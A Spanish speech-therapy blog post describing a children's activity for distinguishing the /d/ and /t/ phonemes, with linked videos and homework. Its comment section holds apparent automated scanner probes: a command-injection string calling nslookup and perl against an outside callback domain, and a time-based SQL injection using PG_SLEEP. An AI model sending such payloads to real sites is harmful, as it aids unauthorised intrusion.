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Discrimando entre el fonema /D/ y fonema /T/

¡Buen día para todos y todas!

 

     Hoy les comparto una actividad para terapia del habla del fonema /d/, el día de hoy vamos a trabajar la discriminación, la cual es muy importante para que el niño logre reconocer sus propias producciones y mejorar su propiocepción. En esta actividad no vamos a demostrar al niño el punto y modo de articulación del fonema /d/ (que nos interesa más por el momento), porque ya lo trabajamos en una actividad anterior en este mismo blog, (al final les dejo el enlace), sino que nos vamos a centrar en presentar los sonidos en los diferentes grupos de palabras. Cabe destacar que hemos elegido dos fonemas muy similares, para algunos niños puede ser realmente difícil, recomendamos paciencia y utilizar una gran gama de ejemplos para ayudar a los niños que no lo logren a la primera...

     

     Nuestra actividad se llama: Reconocer palabras con el fonema /d/ y /t/

 

Desarrollo:

- Observar el vídeo con los papás, para que les ayuden a los niños a repetir las palabras y sonidos que ahí se expresan.

- Preguntarles a los niños qué sonido lleva cada palabra de los dos mencionados "D" o "T", ayudarles a reconocer uno del otro.

- Darles más ejemplos de palabras que inicien con el sonido "D" y pedirles que las repitan

 

Tarea:

Solicitarle al niño que dibuje tres cosas que inicien con el sonido "D".

 

Si desean subir su video a redes sociales no olviden utilizar el hashtag  #CerebritosInquietos o etiquetarnos para conocer a los cerebritos que siguen nuestras actividades.

 

          Les recomendamos visitar la actividad que demuestran el punto y modo de articulación del fonema /d/: 

https://youtu.be/-AjJ_7P_NII

 

 

https://youtu.be/lt-33MzCBb8 

  

   Si les gustan nuestras actividades, no olviden compartir y suscribirse al canal de Youtube:

https://www.youtube.com/channel/UCAFM1sMV68Ego3Wnh86n3sw

 

Si les gustó esta actividad déjenme un comentario.

 

¡Les deseo feliz terapia del habla!

 

Ulises Espino Rodríguez

Neuropsicólogo y Terapeuta Cognitivo Conductual

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Comentarios: 20
  • #1

    gBqsPxAZ (sábado, 01 enero 2022 08:46)

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  • #2

    gBqsPxAZ (sábado, 01 enero 2022 08:50)

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  • #3

    gBqsPxAZ (sábado, 01 enero 2022 08:50)

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  • #4

    gBqsPxAZ (sábado, 01 enero 2022 08:50)

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  • #5

    |(nslookup hitiktraucbdm790ba.bxss.me||perl -e "gethostbyname('hitiktraucbdm790ba.bxss.me')") (sábado, 01 enero 2022 08:50)

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  • #6

    gBqsPxAZ (sábado, 01 enero 2022 08:51)

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  • #7

    gBqsPxAZ (sábado, 01 enero 2022 10:06)

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  • #8

    gBqsPxAZ (sábado, 01 enero 2022 10:35)

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  • #9

    gBqsPxAZ (sábado, 01 enero 2022 11:05)

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    gBqsPxAZ (sábado, 01 enero 2022 11:08)

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  • #11

    gBqsPxAZ (sábado, 01 enero 2022 11:16)

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  • #12

    gBqsPxAZ (sábado, 01 enero 2022 12:32)

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  • #13

    gBqsPxAZ (sábado, 01 enero 2022 12:35)

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  • #14

    gBqsPxAZ (sábado, 01 enero 2022 12:35)

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  • #15

    gBqsPxAZ (sábado, 01 enero 2022 12:35)

    wACBW958')) OR 444=(SELECT 444 FROM PG_SLEEP(15))--

  • #16

    gBqsPxAZ (sábado, 01 enero 2022 12:36)

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  • #17

    gBqsPxAZ (sábado, 01 enero 2022 12:37)

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  • #18

    gBqsPxAZ (sábado, 01 enero 2022 12:37)

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    gBqsPxAZ (sábado, 01 enero 2022 12:38)

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  • #20

    gBqsPxAZ (sábado, 01 enero 2022 12:38)

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